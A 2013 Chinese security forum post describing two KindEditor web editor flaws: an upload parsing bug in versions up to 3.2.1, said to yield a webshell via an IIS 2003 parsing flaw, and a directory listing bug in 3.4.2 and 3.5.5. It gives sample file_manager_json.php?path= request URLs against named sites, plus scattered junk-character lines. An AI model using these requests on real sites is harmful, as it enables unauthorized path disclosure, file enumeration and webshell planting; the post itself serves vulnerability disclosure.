找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2243|回复: 0
打印 上一主题 下一主题

KindEditor上传解析漏洞和列目录漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:16:19 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
KindEditor上传解析漏洞 影响版本:= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL KindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 1.http://www.political-security.com/67cms/kindeditor/php/file_man
0 R# Q! P" V" P3 k* v* l, L- t: T  N) W2 @5 P: b1 K5 x% k

KindEditor上传解析漏洞

影响版本:<= kindeditor 3.2.1(09年8月份发布的最新版)

漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL

; h( J# l, c* V+ |  t5 u. @4 I1 z

1 s1 B" k( ?8 y/ E1 F1 d

KindEditor列目录漏洞

测试版本:KindEditor 3.4.2    KindEditor 3.5.5

  • http://www.political-security.com/67cms/kindeditor/php/file_manager_json.php?path=/
  • //path=/,爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
  • 2.http://netknight.in/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
  • //根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
  • 这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名
    $ y. f7 s( Q. c, V4 v5 d

7 I0 n3 D7 y: K5 b& x% `8 }- T# S; Y9 }
: h" `0 f1 i4 \5 s$ U
: Q( K* R& q% O7 u2 E5 f3 e

: S- k9 k. X% u& j) }
- k/ i: h+ R7 J1 `; ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表